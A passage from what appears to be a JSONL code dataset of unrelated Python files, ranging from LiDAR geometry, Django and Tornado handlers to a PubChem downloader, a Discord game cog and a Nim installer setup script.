(float array, [N, 8, 3]): 3d box corners.\n Returns:\n surfaces (float array, [N, 6, 4, 3]):\n \"\"\"\n # box_corners: [N, 8, 3], must from corner functions in this module\n surfaces = np.array([\n [corners[:, 0], corners[:, 1], corners[:, 2], corners[:, 3]],\n [corners[:, 7], corners[:, 6], corners[:, 5], corners[:, 4]],\n [corners[:, 0], corners[:, 3], corners[:, 7], corners[:, 4]],\n [corners[:, 1], corners[:, 5], corners[:, 6], corners[:, 2]],\n [corners[:, 0], corners[:, 4], corners[:, 5], corners[:, 1]],\n [corners[:, 3], corners[:, 2], corners[:, 6], corners[:, 7]],\n ]).transpose([2, 0, 1, 3])\n return surfaces\n\ndef points_in_convex_polygon_3d_jit(points,\n polygon_surfaces,\n num_surfaces=None):\n \"\"\"check points is in 3d convex polygons.\n Args:\n points: [num_points, 3] array.\n polygon_surfaces: [num_polygon, max_num_surfaces,\n max_num_points_of_surface, 3]\n array. all surfaces' normal vector must direct to internal.\n max_num_points_of_surface must at least 3.\n num_surfaces: [num_polygon] array. indicate how many surfaces\n a polygon contain\n Returns:\n [num_points, num_polygon] bool array.\n \"\"\"\n max_num_surfaces, max_num_points_of_surface = polygon_surfaces.shape[1:3]\n num_points = points.shape[0]\n num_polygons = polygon_surfaces.shape[0]\n if num_surfaces is None:\n num_surfaces = np.full((num_polygons,), 9999999, dtype=np.int64)\n normal_vec, d = surface_equ_3d_jit(polygon_surfaces[:, :, :3, :])\n # normal_vec: [num_polygon, max_num_surfaces, 3]\n # d: [num_polygon, max_num_surfaces]\n ret = np.ones((num_points, num_polygons), dtype=np.bool_)\n sign = 0.0\n for i in range(num_points):\n for j in range(num_polygons):\n for k in range(max_num_surfaces):\n if k > num_surfaces[j]:\n break\n sign = points[i, 0] * normal_vec[j, k, 0] \\\n + points[i, 1] * normal_vec[j, k, 1] \\\n + points[i, 2] * normal_vec[j, k, 2] + d[j, k]\n if sign >= 0:\n ret[i, j] = False\n break\n return ret\n\ndef nuscenes_points_in_rbbox(points, rbbox,rotation_matrix):\n location = rbbox[:, :3]\n dimension = rbbox[:, 3:6]\n ry = rbbox[:, 6]\n iNumObj = ry.shape[0]\n corners_3d_list=[]\n for iIndex in range(iNumObj):\n w,l,h = dimension[iIndex,:]\n x_corners = l / 2 * np.array([1, 1, 1, 1, -1, -1, -1, -1])\n y_corners = w / 2 * np.array([1, -1, -1, 1, 1, -1, -1, 1])\n z_corners = h / 2 * np.array([1, 1, -1, -1, 1, 1, -1, -1])\n rot_mat = rotation_matrix[iIndex,:,:]\n corners = np.vstack((x_corners, y_corners, z_corners))\n corners = np.dot(rot_mat, corners)\n centre = location[iIndex,:]\n centre = np.expand_dims(centre, axis=1)\n rbboxes = centre # np.dot(box.orientation.rotation_matrix, centre)\n x, y, z = location[iIndex,:]\n corners[0, :] = corners[0, :] + x\n corners[1, :] = corners[1, :] + y\n corners[2, :] = corners[2, :] + z\n corners_3d = corners.T\n corners_3d = np.expand_dims(corners_3d, axis=0)\n corners_3d_list.append(corners_3d)\n\n corner_3d = corners_3d_list[0]\n for iIndex in range(iNumObj-1):\n array2 = corners_3d_list[iIndex+1]\n corner_3d = np.concatenate((corner_3d,array2),axis=0)\n surfaces = corner_to_surfaces_3d(corner_3d)\n indices = points_in_convex_polygon_3d_jit(points[:, :3], surfaces)\n return indices","sub_path":"second/pytorch/mayank_play/lidar_bbox_on_nuscne_Data/creating_indeces_from_detection_object_pointcloud.py","file_name":"creating_indeces_from_detection_object_pointcloud.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374107445","text":"from 
django.shortcuts import render\n\ndef home(request):\n    return render(request, \"home.html\")\n\ndef result(request):\n    sentence = request.GET['sentence']\n\n    wordList = sentence.split()\n\n    wordDict = {}\n\n    for word in wordList:\n        if word in wordDict:\n            wordDict[word] += 1\n        else:\n            wordDict[word] = 1\n\n    return render(request, \"result.html\", {'fulltext': sentence, 'count':len(wordList), \"wordDict\":wordDict.items})","sub_path":"django/secondproject/wordCount/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"337737466","text":"def miarka(size):\n    miara = \"\"\n    for i in range(size):\n        if i == 0:\n            miara += \"|....|\"\n        else:\n            miara += \"....|\"\n    liczby = \"\"\n    for i in range(size + 1):\n        if i == 0:\n            liczby += str(i)\n        else:\n            liczby += str(i).rjust(5)\n    wynik = miara + \"\\n\" + liczby\n    return wynik\n\n\nprint(miarka(20))\n","sub_path":"3.5.py","file_name":"3.5.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416300461","text":"# coding: utf-8\n\n# Based on thumbor-community thumbor aws_s3 loader\n# Use of this source code is governed by the MIT license that can be\n# found in the LICENSE file.\n\nfrom boto3.session import Session\n\nclass Bucket(object):\n    \"\"\"\n    This handles all communication with AWS API\n    \"\"\"\n    _bucket = None\n    _local_cache = dict()\n\n    def __init__(self, bucket, region, endpoint, accessKeyId, secretAccessKey):\n        \"\"\"\n        Constructor\n        :param string bucket: The bucket name\n        :param string region: The AWS API region to use\n        :param string accessKeyId: The AWS access key ID for accessing the bucket\n        :param string secretAccessKey: The AWS secret access key for accessing the bucket\n        The created S3 client is stored on the instance.\n        \"\"\"\n        self._bucket = bucket\n        \n        self._client = Session().client(\n            service_name='s3',\n            aws_access_key_id=accessKeyId,\n            aws_secret_access_key=secretAccessKey,\n            region_name=region,\n            endpoint_url=endpoint\n        )\n\n    def get(self, path):\n        \"\"\"\n        Returns object at given path\n        :param string path: Path or 'key' to retrieve AWS object\n        \"\"\"\n\n        response = self._client.get_object(Bucket=self._bucket, Key=path)\n\n        return response['Body'].read()\n    \n\n","sub_path":"remotecv_aws/bucket.py","file_name":"bucket.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570878730","text":"#!/usr/bin/env python\n# coding=UTF-8\n# Title: handler.py\n# Description: This file contains all tornado.web.RequestHandler classes used in this application\n# Author David Nellessen \n# Date: 12.01.15\n# Note: \n# ==============================================================================\n\n# Import modules\nfrom tornado import web, gen, escape\nfrom tornado.escape import utf8\nimport logging\nimport phonenumbers\nimport pygeoip\nfrom tornado.iostream import StreamClosedError\n\n\nclass BaseHandler(web.RequestHandler):\n    \"\"\"\n    A base handler providing localization features, phone number validation\n    and formatting, as well as service-usage limiting based on IP addresses.\n    It also implements support for JSONP (for cross-domain requests).\n    \"\"\"\n    guess_country = True\n    default_country = 'DE'\n\n    def __init__(self, application, request, **kwargs):\n        super(BaseHandler, self).__init__(application, request, **kwargs)\n        
self.counter = {}\n\n\n    def write(self, chunk):\n        \"\"\"\n        Overwrites the default write method to support JSONP.\n        \"\"\"\n        if self._finished:\n            raise RuntimeError(\"Cannot write() after finish().  May be caused \"\n                               \"by using async operations without the \"\n                               \"@asynchronous decorator.\")\n        if isinstance(chunk, dict):\n            chunk = escape.json_encode(chunk)\n            self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n        callback = self.get_argument('callback', None)\n        if callback:\n            chunk = callback + '(' + chunk + ');'\n        chunk = utf8(chunk)\n        self._write_buffer.append(chunk)\n\n\n    def get_browser_locale_code(self):\n        \"\"\"\n        Determines the user's locale from ``Accept-Language`` header.\n        This is similar to tornado.web.get_browser_locale except it\n        returns the code and not a Locale instance. Also, this will return\n        a result whether or not a translation for this language was loaded.\n\n        See http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4\n        \"\"\"\n        if \"Accept-Language\" in self.request.headers:\n            languages = self.request.headers[\"Accept-Language\"].split(\",\")\n            locales = []\n            for language in languages:\n                parts = language.strip().split(\";\")\n                if len(parts) > 1 and parts[1].startswith(\"q=\"):\n                    try:\n                        score = float(parts[1][2:])\n                    except (ValueError, TypeError):\n                        score = 0.0\n                else:\n                    score = 1.0\n                locales.append((parts[0], score))\n            if locales:\n                locales.sort(key=lambda pair: pair[1], reverse=True)\n                logging.debug(locales)\n                codes = [l[0] for l in locales]\n                return codes[0]\n        return self.__class__.default_country\n\n\n    def get_user_country_by_ip(self):\n        \"\"\"\n        Determines the user's country by his IP-address. This will return\n        the country code or None if not found.\n        \"\"\"\n        country = None  # Ensure 'country' is defined even if both lookups fail.\n        try:\n            country = self.application.geo_ip.country_code_by_addr(\n                self.request.remote_ip)\n        except pygeoip.GeoIPError:\n            try:\n                country = self.application.geo_ipv6.country_code_by_addr(\n                    self.request.remote_ip)\n            except pygeoip.GeoIPError:\n                pass\n        if not country:\n            logging.warning('Could not locate country for ' + self.request.remote_ip)\n            return None\n        else:\n            logging.debug('Determined country by IP address: ' + country)\n            return country\n\n\n    def parse_phonenumber(self, number):\n        \"\"\"\n        Validates and parses a phonenumber. It will return a\n        phone number object or False if parsing failed.\n\n        If the phone number is not given in full international notation, the\n        country will be guessed if the class attribute guess_country\n        is True. Guessing will be done as follows:\n        1. If a query string parameter 'country' is given as a country code\n        (i.e. 'US', 'DE', ...) it will be used.\n        2. If no parameter country is given the country will be determined by\n        the remote IP address.\n        3. Otherwise the country determined by the request header\n        Accept-Language will be used.\n        4. 
As a fall-back the class's default_country attribute will be used.\n        \"\"\"\n        try:\n            return phonenumbers.parse(number)\n        except:\n            # Get the country code to use for phone number parsing.\n            if self.__class__.guess_country:\n                country_code = self.get_argument('country', None)\n                if country_code == None:\n                    country_code = self.get_user_country_by_ip()\n                if country_code == None:\n                    code = self.get_browser_locale_code().replace('-', '_')\n                    parts = code.split('_')\n                    if len(parts) > 1: country_code = parts[1]\n                if country_code == None: country_code = self.__class__.default_country\n                country_code = country_code.upper()\n                logging.debug(\"Final country code: \" + country_code)\n            else:\n                country_code = self.__class__.default_country\n            # Parse the phone number into international notation.\n            try:\n                number_parsed = phonenumbers.parse(number, country_code)\n                return number_parsed\n            except:\n                return False\n\n\n    @gen.coroutine\n    def limit_call(self, chash=None, amount=2, expire=10):\n        \"\"\"\n        Use this function to limit user requests. Returns True if this function\n        was called less than 'amount' times in the last 'expire' seconds with\n        the same value 'chash' and the same remote IP address or False\n        otherwise.\n        \"\"\"\n        key = 'limit_call_' + chash + '_' + self.request.remote_ip\n        redis = self.application.redis\n        try:\n            current_value = yield gen.Task(redis.get, key)\n        except StreamClosedError:\n            yield gen.Task(self.application.redis_reconnect)\n            redis = self.application.redis\n            current_value = yield gen.Task(redis.get, key)\n        if current_value != None and int(current_value) >= amount:\n            logging.info('Call limit exceeded: ' + key)\n            raise gen.Return(False)\n        else:\n            yield gen.Task(redis.incr, key)\n            if not current_value: yield gen.Task(redis.expire, key, expire)\n            raise gen.Return(True)\n\n\nclass DLRHandler(web.RequestHandler):\n    \"\"\"\n    Handles delivery receipts.\n    \"\"\"\n    def get(self):\n        \"\"\"\n        All delivery receipts will be sent as HTTP-GET requests.\n        \"\"\"\n        # TODO: Parse request!\n        logging.info('Received DLR. Not yet parsed though.')\n\n\n\nclass NumberValidationHandler(BaseHandler):\n    \"\"\"\n    Validates a phone number.\n    \"\"\"\n    limit_amount = 10\n    limit_expires = 3600\n\n    @gen.coroutine\n    def get(self):\n        \"\"\"\n        Validates a phone number given as the query string parameter 'number'.\n\n        If the phone number is not given in full international notation, the\n        country will be guessed if the class attribute guess_country\n        is True. Guessing will be done as follows:\n        1. If a query string parameter 'country' is given as a country code\n        (i.e. 'US', 'DE', ...) it will be used.\n        2. If no parameter country is given the country will be determined by\n        the remote IP address.\n        3. Otherwise the country determined by the request header\n        Accept-Language will be used.\n        4. 
As a fall-back the class attribute default_country will be used.\n        \"\"\"\n        # Limit calls.\n        if self.limit_amount and not (yield self.limit_call('number_validation', self.limit_amount, self.limit_expires)):\n            #raise web.HTTPError(403, 'Number Validation request limit exceeded')\n            self.finish({'status': 'error',\n                         'error': 'limit_acceded'})\n            return\n\n        # Decode request's query string parameters.\n        number = self.get_argument('number', None)\n        if not number:\n            self.finish({'status': 'error',\n                         'error': 'number_missing'})\n            return\n        logging.debug('Received number {} for validation'.format(number))\n        numberobj = self.parse_phonenumber(number)\n        if numberobj:\n            number = phonenumbers.format_number(numberobj,\n                phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n        else: number = False\n        self.finish({'status': 'ok',\n                     'number': number})\n\n\n\nclass SimpleMessageHandler(BaseHandler):\n    message = 'This is an Example Message'\n    sender = 'Put a sender title or number here'\n    limit_amount = 10\n    limit_expires = 3600\n\n    @gen.coroutine\n    def get(self):\n        # Limit calls.\n        if self.limit_amount and not (yield (self.limit_call('example_handler', self.limit_amount, self.limit_expires))):\n            self.finish({'status': 'error',\n                         'error': 'limit_acceded'})\n            return\n\n        # Get receiver's phone number as 'receiver' parameter.\n        receiver = self.get_argument('receiver', None)\n        if not receiver:\n            self.finish({'status': 'error',\n                         'error': 'receiver_missing'})\n            return\n\n        # Parse the given phone number.\n        receiverobj = self.parse_phonenumber(receiver)\n        if not receiverobj:\n            self.finish({'status': 'error',\n                         'error': 'receiver_validation'})\n            return\n\n        # Format numbers for processing and displaying.\n        receiver_nice = phonenumbers.format_number(receiverobj,\n            phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n        receiver = phonenumbers.format_number(receiverobj,\n            phonenumbers.PhoneNumberFormat.E164)\n\n        # Send message to receiver.\n        result = yield gen.Task(self.application.nexmo_client.send_message,\n                                self.__class__.sender, receiver,\n                                self.__class__.message)\n\n        # Process result.\n        if result: self.finish({'status': 'ok',\n                                'message': 'Message sent',\n                                'number': receiver_nice})\n        else: self.finish({'status': 'error',\n                           'error': 'nexmo_error',\n                           'message': 'Nexmo Service Error',\n                           'number': receiver_nice})\n\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"206160316","text":"import sys, pandas, numpy;\n\nif len(sys.argv) >= 6:\n\tdata = pandas.read_csv(sys.argv[1],header=None);\n\tcov = numpy.cov(m=data[1],y=data[2])\n\ts1 = eval(sys.argv[2]);\n\ts12 = eval(sys.argv[3]);\n\ts2 = eval(sys.argv[4]);\n\terr = eval(sys.argv[5]);\n\tmaxerr = numpy.max(numpy.abs([[s1,s12],[s12,s2]]-cov))\n\tif maxerr > err :\n\t\tprint(sys.argv[0],\": covariance error (%g) is too large, cov = %s\"%(maxerr,cov.flatten()))\n\t\tquit(1);\nelse:\n\traise Exception(\"Syntax: python3 check_correlation.py <datafile> <s1> <s12> <s2> <err>\")\n","sub_path":"source/autotest/check_correlation.py","file_name":"check_correlation.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571120347","text":"#!/usr/bin/env python3\n\n\"\"\" Assignment 3, Exercise 2, INF1340, Fall, 2015. DBMS\n\nThis module performs table operations on database tables\nimplemented as lists of lists. 
\"\"\"\n\n__author__ = \"Kei'ichiro Yamamoto, Albert Tai, Niel Chah\"\n__email__ = \"keiichiro.yamamoto@mail.utoronto.ca, albert.tai@mail.utoronto.ca, niel.chah@mail.utoronto.ca\"\n__copyright__ = \"2015 Kei'ichiro Yamamoto, Albert Tai, Niel Chah\"\n__license__ = \"MIT License\"\n\n\n#####################\n# HELPER FUNCTIONS ##\n#####################\n\ndef remove_duplicates(listoflists):\n \"\"\"\n This function removes duplicates from l, where l is a List of Lists.\n :param listoflists: a List\n \"\"\"\n\n d = {}\n result = []\n for row in listoflists:\n if tuple(row) not in d:\n result.append(row)\n d[tuple(row)] = True\n\n return result\n\n\nclass UnknownAttributeException(Exception):\n \"\"\"\n Raised when attempting set operations on a table\n that does not contain the named attribute\n \"\"\"\n pass\n\n\ndef selection(table1, function):\n \"\"\"\n Perform select operation on table t that satisfy condition f.\n\n Example:\n > R = [[\"A\", \"B\", \"C\"], [1, 2, 3], [4, 5, 6]]\n ># Define function f that returns True iff\n > # the last element in the row is greater than 3.\n > def f(row): row[-1] > 3\n > select(R, f)\n [[\"A\", \"B\", \"C\"], [4, 5, 6]]\n\n :param table1: this is the table that the function operate on\n :param function: this is a function that operates on the table\n\n :return: None if empty result(only has title row) or list\n \"\"\"\n result = []\n if not table1: # check if table 1 is empty if so return none\n return None\n result.append(table1[0]) # append the title row\n for row in table1[1:]: # cycle through everything except title row\n if function(row): # check if function wants the row\n result.append(row) # if so append it\n if len(result) == 1: # return None if only has title row\n return None\n else:\n return result # return table\n\n\ndef projection(table, attributes):\n \"\"\"\n Perform projection operation on table t\n using the attributes subset r.\n\n Example:\n > R = [[\"A\", \"B\", \"C\"], [1, 2, 3], [4, 5, 6]]\n > projection(R, [\"A\", \"C\"])\n [[\"A\", \"C\"], [1, 3], [4, 6]]\n\n :param table: this is the table that attribute columns will be found in\n :param attributes: this is a list of attributes that we are trying to find in table\n\n :return: None if empty result or list with just attribute columns from table\n \"\"\"\n\n positions_list = [None] * len(attributes) # allocate space for the list of positions\n position_counter = 0 # start the counter for position list at zero\n result = [] # initialize the result\n column_counter = 0 # counter for column header\n if not attributes: # checking if the attributes is empty\n raise UnknownAttributeException(\"Attributes is empty\")\n for item in attributes: # cycling through all attributes\n if item in table[0]: # check if attribute is in table title\n positions_list[position_counter] = table[0].index(item) # store the column row found into position list\n position_counter += 1 # increment the counter for positions\n else:\n raise UnknownAttributeException(item + \" cannot be found in table\") # raise exception if cannot be found\n for row in table: # cycle through the rows and append positions found\n for position in positions_list: # cycle through to find all positions of the attributes\n if positions_list.index(position) == 0: # check if first in the column\n result.append([row[position]])\n else:\n result[column_counter].append(row[position]) # otherwise append to the row in result\n column_counter += 1 # increment the column counter\n return result\n\n\ndef cross_product(t1, t2):\n \"\"\"\n 
Return the cross-product of tables t1 and t2.\n\n    Example:\n    > R1 = [[\"A\", \"B\"], [1,2], [3,4]]\n    > R2 = [[\"C\", \"D\"], [5,6]]\n    [[\"A\", \"B\", \"C\", \"D\"], [1, 2, 5, 6], [3, 4, 5, 6]]\n\n    :param t1: First table in the cross product\n    :param t2: Second table in the cross product, matched against each row of table 1\n\n    :return: None if empty or list with result\n\n    \"\"\"\n    result = []  # initialize result table\n    if not t1 or not t2:  # check if either tables are empty\n        return None\n    if len(t2) == 1:  # check if table 2 only has title row\n        return None\n    result += [t1[0] + t2[0]]  # add the column titles together of table 1 and 2\n    for t1counter in range(1, len(t1)):  # Retrieve each row of table1 starting from after column labels\n        for t2counter in range(1, len(t2)):  # Retrieve each row of table2 starting from after column labels\n            result += [t1[t1counter] + t2[t2counter]]  # add it to the result table\n    if not result:  # if the result is empty\n        return None\n    return result\n\n\ndef filter_employees(row):\n    \"\"\"\n    Check if employee represented by row\n    is AT LEAST 30 years old and makes\n    MORE THAN 3500.\n    :param row: A List in the format:\n    [{Surname}, {FirstName}, {Age}, {Salary}]\n    :return: True if the row satisfies the condition.\n    \"\"\"\n    return row[-2] >= 30 and row[-1] > 3500\n\n","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"97835335","text":"import json\n\nimport requests\n\nfrom extractors.result import Result\n\n\nHEADERS = {\n    \"Host\": \"share.ippzone.com\",\n    \"Connection\": \"keep-alive\",\n    \"Content-Length\": \"45\",\n    \"Origin\": \"http://share.ippzone.com\",\n    \"User-Agent\":\n    \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36\",\n    \"Content-Type\": \"text/plain;charset=UTF-8\",\n    \"Accept\": \"*/*\",\n    \"Referer\": \"http://share.ippzone.com/\",\n    \"Accept-Encoding\": \"gzip, deflate\",\n    \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n}\n\nPOST_URL = \"http://share.ippzone.com/ppapi/share/fetch_content\"\n\n\ndef get(url: str) -> dict:\n    result = Result()\n    pid = int(url[33:])  # get pid\n    post_data = {\n        \"pid\": pid,\n        \"type\": \"post\",\n    }\n    with requests.post(POST_URL, headers=HEADERS, data=json.dumps(post_data), timeout=20) as rep:\n        if rep.status_code == 200:\n            data = rep.json()\n\n            # The handling below is messy; it is easy to follow if you compare it with the returned JSON\n            id = data.get('data').get('post').get('imgs')[0].get('id')\n            if id:\n                play_url = data.get('data').get('post').get('videos').get(str(id)).get('url')\n                if not play_url:\n                    play_url = \"\"\n            else:\n                play_url = \"\"\n            # --------------------------------------------------------------\n        else:\n            play_url = \"\"\n        result.videoUrls.append(play_url)\n\n    return result()\n\n\nif __name__ == \"__main__\":\n    print(get(input(\"url: \")))","sub_path":"extractors/pipigaoxiao.py","file_name":"pipigaoxiao.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473636645","text":"# Task 1\n\nimport pubchempy as pcp\nimport sys\nfrom rdkit import Chem\n\ncids_str = sys.argv\ncids = []\n\n# Convert input cid list to integer\nfor cid in cids_str[1:]:\n    cid = int(cid)\n    cids.append(cid)\n\n# Download file in SDF format\npcp.download('SDF', 'output.sdf', cids, 'cid', overwrite=True)\n\n# Download file in CSV format with some chosen features\npcp.download('CSV', 'output.csv', cids, 
operation='property/\\\nMolecularFormula,\\\nMolecularWeight,\\\nCanonicalSMILES,\\\nIUPACName,\\\nXLogP,\\\nExactMass,\\\nMonoisotopicMass,\\\nTPSA,\\\nComplexity,\\\nCharge,\\\nHBondDonorCount,\\\nHBondAcceptorCount,\\\nRotatableBondCount,\\\nHeavyAtomCount,\\\nIsomericSMILES', overwrite=True)\n\n# Convert from SDF to SMILES format\nsdf_file = Chem.SDMolSupplier('output.sdf')\nwith open('output.smi', 'w') as file:\n for mol in sdf_file:\n smiles = Chem.MolToSmiles(mol)\n file.write(\"{}\\n\".format(smiles))\n\n\n\n","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5751602","text":"#!/usr/bin/env python\n\n#Imports\nimport discord \nimport random\nfrom discord.ext import commands\n\nclass Game(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n @commands.command()\n async def rroulette(self, ctx, userid2: str): \n userid1 = ctx.author.id\n await ctx.send('You have been invited to play russian roulette ' + userid2 + \".\" + \" Do you accept? Y/N\")\n \n await ctx.send('Welcome to russian roulette.')\n @commands.command()\n async def rps(self, ctx, user_input: str): \n cpu_rps = [\"rock\", \"paper\", \"scissors\"]\n cpu_choice = random.choice(cpu_rps)\n user_choice = user_input.lower()\n if user_choice == cpu_choice:\n await ctx.send(\"You have tied with a bot. Shows you why you\\'re being replaced.\")\n else:\n if user_choice == \"rock\":\n if cpu_choice == \"paper\":\n await ctx.send(\"You won. Congratulations, it's a celebration, hopefully this doesn\\'t earn me a demonitization.\")\n if cpu_choice == \"scissors\":\n await ctx.send(\"Yikes. You lost. You feeling like pennies?\")\n if user_choice == \"paper\":\n if cpu_choice == \"rock\":\n await ctx.send(\"Yikes. You lost. You feeling like pennies?\")\n if cpu_choice == \"scissors\":\n await ctx.send(\"You won. Congratulations, it's a celebration, hopefully this doesn\\'t earn me a demonitization.\")\n if user_choice == \"scissors\":\n if cpu_choice == \"rock\":\n await ctx.send(\"Yikes. You lost. You feeling like pennies?\")\n if cpu_choice == \"paper\":\n await ctx.send(\"You won. Congratulations, it's a celebration, hopefully this doesn\\'t earn me a demonitization.\")\n @commands.command()\n async def magic8(self, ctx,): \n userid1 = ctx.author.id\n shake_numbers = [\"1\", \"2\", \"3\"]\n shake = random.choice(shake_numbers)\n await ctx.send('You shook the magic 8 ball ' + shake + \" times.\")\n if userid1 == 120195047470661632:\n await ctx.send('There is no hope left for you...')\n elif userid1 == 393160457508225036:\n await ctx.send('Anata wa pesuto kara yūtopia o kōchiku shi, tetsu no ken de sekai o shihai surudeshou. Senpai otōsan.')\n elif userid1 == 357953549738573835:\n await ctx.send('Egg.')\n elif userid1 == 180852994231762945:\n await ctx.send('Your only future is being pushed later by you... Stop procrastinating.')\n else:\n if shake == \"1\":\n await ctx.send('http://www.script-o-rama.com/movie_scripts/a1/bee-movie-script-transcript-seinfeld.html')\n if shake == \"2\":\n await ctx.send('I think you would love a homeowners insurance.')\n if shake == \"3\":\n await ctx.send('My man Mahmud. What you think you doin eh? 
Go get workin on those sunflowers my dude.')\n \n\n\n\ndef setup(bot):\n bot.add_cog(Game(bot))\n ","sub_path":"Shu Bot/modules/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502176260","text":"import os, sys, pathlib, warnings, setuptools, subprocess, shutil\nfrom setuptools.command.install import install\n\n\nassert sys.version_info > (3, 5, 0), \"ERROR: Python version must be > 3.5!.\" # F-String.\nos.environ[\"CHOOSENIM_NO_ANALYTICS\"] = \"1\"\n\n\nclass X(install):\n\n def nimble_setup(self):\n # After choosenim, we check that Nimble is working,\n # as \"nimble\" or \"~/.nimble/bin/nimble\", then install nimpy and fusion\n result = False\n ext = \".exe\" if sys.platform.startswith(\"win\") else \"\"\n nimble_exe = 'nimble' + ext # Try \"nimble\"\n if subprocess.run(f\"{ nimble_exe } --version\", shell=True, timeout=99).returncode != 0:\n nimble_exe = pathlib.Path.home() / '.nimble' / 'bin' / f\"nimble{ext}\" # Try full path to \"nimble\"\n if subprocess.run(f\"{ nimble_exe } --version\", shell=True, timeout=99).returncode != 0:\n warnings.warn(f\"Nimble not found, tried '{ nimble_exe }' and 'nimble'\")\n nim_exe = shutil.which(f\"nim{ext}\") # Ask shutil for \"nim\"\n if nim_exe is not None:\n nim_exe = pathlib.Path(nim_exe)\n if subprocess.run(f\"{ nim_exe } --version\", shell=True, timeout=99).returncode != 0:\n nim_exe = pathlib.Path.home() / '.nimble' / 'bin' / f\"nim{ext}\" # Try full path to \"nim\"\n if subprocess.run(f\"{ nim_exe } --version\", shell=True, timeout=99).returncode != 0:\n warnings.warn(f\"Nim not found, tried '{ nim_exe }' and 'nim'\")\n if os.path.exists(nimble_exe):\n nimble_cmd = f\"{ nimble_exe } -y --noColor --nim:'{ nim_exe }'\"\n if subprocess.run(f\"{ nimble_cmd } refresh\", shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ nimble_cmd } --verbose refresh\")\n if subprocess.run(f\"{ nimble_cmd } install nimpy\", shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ nimble_cmd } install nimpy\")\n if subprocess.run(f\"{ nimble_cmd } install fusion\", shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ nimble_cmd } install fusion\")\n result = True\n else:\n warnings.warn(f\"Failed to run '{ nimble_cmd } install fusion'\")\n else:\n warnings.warn(f\"Failed to run '{ nimble_cmd } install nimpy'\")\n else:\n warnings.warn(f\"Failed to run '{ nimble_cmd } refresh'\")\n else:\n warnings.warn(f\"File not found '{ nimble_exe }'\")\n return result\n\n def choosenim_setup(self):\n # Check for choosenim using \"choosenim --version\", to see if it is already installed,\n # if it is installed, run \"choosenim update self\" and \"choosenim update stable\",\n # if it is not installed run \"init.sh\" or \"choosenim --firstInstall\" to install choosenim.\n result = False\n choosenim_exe = \"choosenim.exe\" if sys.platform.startswith(\"win\") else \"choosenim\"\n if subprocess.run(f\"{ choosenim_exe } --version\", shell=True, timeout=999).returncode == 0:\n warnings.warn(f\"Choosenim is already installed and working on the system '{ choosenim_exe }'\")\n if subprocess.run(f\"{ choosenim_exe } update self\", shell=True, timeout=999).returncode != 0:\n warnings.warn(f\"Failed to run '{ choosenim_exe } update self'\") # Dont worry if \"update self\" fails.\n if subprocess.run(f\"{ choosenim_exe } update stable\", shell=True, timeout=999).returncode == 0:\n result = True\n else:\n warnings.warn(f\"Failed to run '{ 
choosenim_exe } update stable'\")\n else:\n choosenim_exe = pathlib.Path(__file__).parent / \"choosenim.exe\" if sys.platform.startswith(\"win\") else \"init.sh\"\n if os.path.exists(choosenim_exe):\n choosenim_cmd = f\"{ '' if sys.platform.startswith('win') else 'sh '}{ choosenim_exe } { ' --yes --verbose --noColor --firstInstall stable' if sys.platform.startswith('win') else ' -y' }\"\n if subprocess.run(choosenim_cmd, shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ choosenim_cmd }\")\n if sys.platform.startswith('win'):\n if subprocess.run(f\"{ choosenim_exe } stable --firstInstall\", shell=True, timeout=999).returncode == 0:\n result = True\n else:\n result = True\n else:\n warnings.warn(f\"Failed to run '{ choosenim_cmd }'\")\n else:\n warnings.warn(f\"File not found '{ choosenim_exe }'\")\n shutil.rmtree(str(pathlib.Path.home() / \".choosenim\" / \"downloads\"), ignore_errors=True) # Clear download cache.\n return result\n\n def add_to_path(self):\n # On Linux add Nim to the PATH.\n if not sys.platform.startswith(\"win\"):\n new_path = f\"export PATH={ pathlib.Path.home() / '.nimble/bin' }:$PATH\"\n filename = pathlib.Path.home() / \".bashrc\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(f\"Failed to write file: {filename}\")\n filename = pathlib.Path.home() / \".profile\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n 